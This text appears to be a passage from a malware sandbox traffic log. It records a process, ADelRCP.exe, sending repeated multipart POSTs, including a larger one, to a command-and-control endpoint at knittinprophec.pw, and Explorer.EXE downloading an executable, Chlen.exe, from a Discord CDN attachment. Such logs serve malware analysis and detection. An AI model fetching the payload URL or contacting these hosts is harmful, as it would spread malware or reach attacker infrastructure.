User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=70fskc0q2590vcmt4coq9jeh8l; expires=Tue, 12 Mar 2024 09:53:45 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:06 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NFBi9c3moxZBP3zyG2SV6tIlT%2Fh9VDpIDEjnWYNBeaStgpJN7R2wDg4NUG8N%2BVrWFEmrY8sjmyka2Wac9zAGXXVbYfgFEAdY%2BgvfUyi4RUENBC5cnibpfQXOP21ncUJ9XkqiiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793989d84b6615-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=lt2ubtke43prpejto8e1d9k2jk; expires=Tue, 12 Mar 2024 09:53:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EGHTWzKjfAgotGsQIT7gS3kmizufl0I1OnidYR%2FBD4Kz5x0qr6gmKuD2FTp8%2Bs8pBOnTKUt6YHhcSUNedrA%2B5Z7DgJBkR%2F6i6sT0%2Bj6qviiVj1j3QqwSiJBjWvABqVasPZeyyA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8279398edb7f6637-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=27pik1c3h2lb0bbarntau3ovm8; expires=Tue, 12 Mar 2024 09:53:47 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:08 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J1MbzJsKG6CdK02GPIjzNpBy%2BM%2FpI3vaYYZTo6c0jIn2Tqwc6cOsalFcnUEVILl8F1L54BaaMpaJK4ecwZy3tOrz02rFiy5yEBBNMUpuv6TvX5W2Nul3TdpuNJ7heUcsnFD5Zg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939929c466610-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=n3h2st1d5jp83p7d5bfetlu6gi; expires=Tue, 12 Mar 2024 09:53:47 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:08 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QGZ2BeVDZO8VU4bw615Z%2FoUZgbqxc4eRX3W0RLzUaAg1z5Mved4xEzO2fxvf3E%2B%2B7ELlVjEG3P%2BSfngPqA47OOyK%2Bb9EPFXjbnwGUGp%2BRrNYOn1vr7GT3XGALeweloMQGau0rA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939969921667a-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=tegllnftdjoglvo3l50itc1li8; expires=Tue, 12 Mar 2024 09:53:48 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:09 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bTu6rzeHH83NN514Of8v3hU4%2BgImdUkMqUqWNwk2hknY%2BxIwps6c19rXpb3oj6dPrzl622f7Y8o6yZpnMXVExYxISXpq2zmbbNj2vPIJVKcPaxlC2%2BYHflaal%2FOuF6C4rbJMBg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8279399a287c0b73-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=1ufdhc07n352vonni9dbs2tlp0; expires=Tue, 12 Mar 2024 09:53:48 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:09 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nJggZS5QPMNkyM0BuXALDKAmYDPsSPwLgDfTpUl03QUKXJgCJeVeMMPh6LcljBevycff3FlsLHSh1e9SlFb58KRcU5Yi8IPvCurVtFba6F1KmhVQTvUjjyP%2Fqhh0f60Cv1wi7A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8279399ceb646643-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=jq5cscfifn0cuk94hnsdspe4su; expires=Tue, 12 Mar 2024 09:53:49 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:10 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zZdrqOUnHwUgpM2x5d7awFvWuMteLGcJ1lEYZO%2FUUluvcGZ9GqQH5A%2BW2YfxwGWneLWHgjJI9iFuaBLjG1un22YPVwjhZs7o64iV7Kz4SDkyUxY5Obe3jNCX2%2FgdIibPeKuTqw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939a09f0eb927-AMS
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=k4f99qkfu8cs8ajj31rgpq81l3; expires=Tue, 12 Mar 2024 09:53:50 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:11 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=moWjOrAFRlrZoDLKRAy9rTyOWrVoIjK%2FzPaCKYwthulNvLhJff3otYRupuVhW8BSlReDpEA%2BJCxcWoCyCtuTwTr%2FuhIOzSxL%2Bif5CbyTwGi%2Fw0iij2Nfr6wTUKqdX%2BF1qedmFw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939a558be5c48-AMS
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.130.233
GET

https://cdn.discordapp.com/attachments/1149095701733724203/1174025624365584404/Chlen.exe

Explorer.EXE

Remote address:

162.159.129.233:443

Request

GET /attachments/1149095701733724203/1174025624365584404/Chlen.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: cdn.discordapp.com

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:11 GMT
Content-Type: application/x-msdos-program
Content-Length: 1715688
Connection: keep-alive
CF-Ray: 827939abcf0c655b-AMS
CF-Cache-Status: HIT
Accept-Ranges: bytes
Age: 257291
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="Chlen.exe"
ETag: "ae9c2e6594d5d3cf864a9ab898384703"
Expires: Sat, 16 Nov 2024 16:07:11 GMT
Last-Modified: Tue, 14 Nov 2023 16:38:41 GMT
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=86400
x-goog-generation: 1699979921284883
x-goog-hash: crc32c=8c7i6w==
x-goog-hash: md5=rpwuZZTV08+GSpq4mDhHAw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1715688
X-GUploader-UploadID: ABPtcPqfSeXciL5a-mRLysBGtzYwwpsPiNfWUPTJuvpJ_cJjfaSrJ13Pe9uRQC0HhK6zLjZV_n8
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=x5Y7uKfKtYKRx7P7J5uPB2RJPBf2ts438KKtB.sgN3k-1700237231-0-AS6YlbgGK0lxvaY2agC9WPvqDKsLEXoZqyQ5slAaVqqy6gkHKyA/uFkk1u997LKampyLPz1P+6vTcJyFaC0hG5E=; path=/; expires=Fri, 17-Nov-23 16:37:11 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kGVSws9IhIvScPimY7ClRn3qWX3HCE%2FkLKwnLEwXpCusVwv%2B%2BAKIBoaYkwxUSqAvf%2BwvTF3rcUKxT%2BfmJQYUjjrCeBu3x5l%2FDlrXAkM6zBQ7%2FFbwlsr6clTzQfkeXjzn4TZBXA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=KWySeYVqaCi0JwnJz8UUqGfDHPShvUkf3sEZ0OJCL94-1700237231994-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16309
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=db0ffav33lnj3katse4gj31dfp; expires=Tue, 12 Mar 2024 09:53:51 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:12 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7nsE3kR2ptBfd78Gb78tqjlRVZcITSIngXhpIomYUI4swR1p860SHkY7rOUreYh2cRFY1FFnQE2C4QYsu9ZXVY4U1QesEJ3jq4E6oiHugRVGYMD61yxP%2FZv8NHiDV9dSdtcLaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939ae5ad8664c-AMS
DNS

233.129.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.129.159.162.in-addr.arpa

IN PTR

Response
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=h85lhpj1n85cfh8gjio87op7sg; expires=Tue, 12 Mar 2024 09:53:52 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:13 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YdJ70tUaIhZVx4oyAeEqNNzWjPoQvtu06p%2BkieBn%2Be%2FngKOMEIDaLzN2eEAkC00hbzC%2BM7KMzeOeIaDYu9gS%2FxLKDWoDCRLRVGY5t8PNr7d86OL%2F%2BzxzCf1wTX1ZpZq0JQjpmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939b48ce46644-AMS
DNS

235.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.175.169.194.in-addr.arpa

IN PTR

Response
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5q9e55uqv5dqb7600o37kre1eo; expires=Tue, 12 Mar 2024 09:53:53 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:14 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UHNl81IjNua1MI4fBTBC1L%2BQYX7MxFwRHZOHG8WG3lv3oA8vMlBwsEGvU3dnmoCRMtyEqxhuaQ9n9IFowf444oVPnMKqX3xTfBo07gGKk9ALuNeqD7tDHSzCyaAiQaUP4a%2FChA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939b7cfac0bce-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=1p2v1fiav54vs7mvkrd8htlp9s; expires=Tue, 12 Mar 2024 09:53:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4KsVE5fnp0xa3Zmi7sGIamNjnR%2BZR4EeGA5R0Q%2B2ULj%2FnyXt5owz6XOnJLcyUifbbpRboXoq%2Fzg%2FvTvQVuD%2BE%2BRrzInrqblf%2FP6EN4JsEb%2BBP%2BiY%2FhcX9Ac%2FMqVBhPTYK%2BVTVg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939bfc854b987-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8mof6kbfrteeg4o6qsjrk1gjjm; expires=Tue, 12 Mar 2024 09:53:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DH0CzGK9bmCtijEBPjBOouVvKEXd8aAUzZdXg13KaBWTO%2FtGnUyljg3oV7hL5nhiPB6x304pdMXgJipiQ%2FISF5UjnRFk2OXqeOsJQ4PhgsRiQcEvZHvjLyDYi7ZNWnTBCkw3Qw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939c35d636625-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=f5g1v05jpguahgk5mto3frghk2; expires=Tue, 12 Mar 2024 09:53:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=On05DJyMBnSUzpWz9wy1foxSCvi7vo8LYHeDL5OmpHRXmtS%2BtBTClyxunsOAJojYzQRo6KZac%2B9nZMDoYcNDq22SH1yR1QOKiTivz5ze6BttDJtcrL%2BdOdBqZ%2BYxYyFXqjLKkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939c689bc0b3e-AMS
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
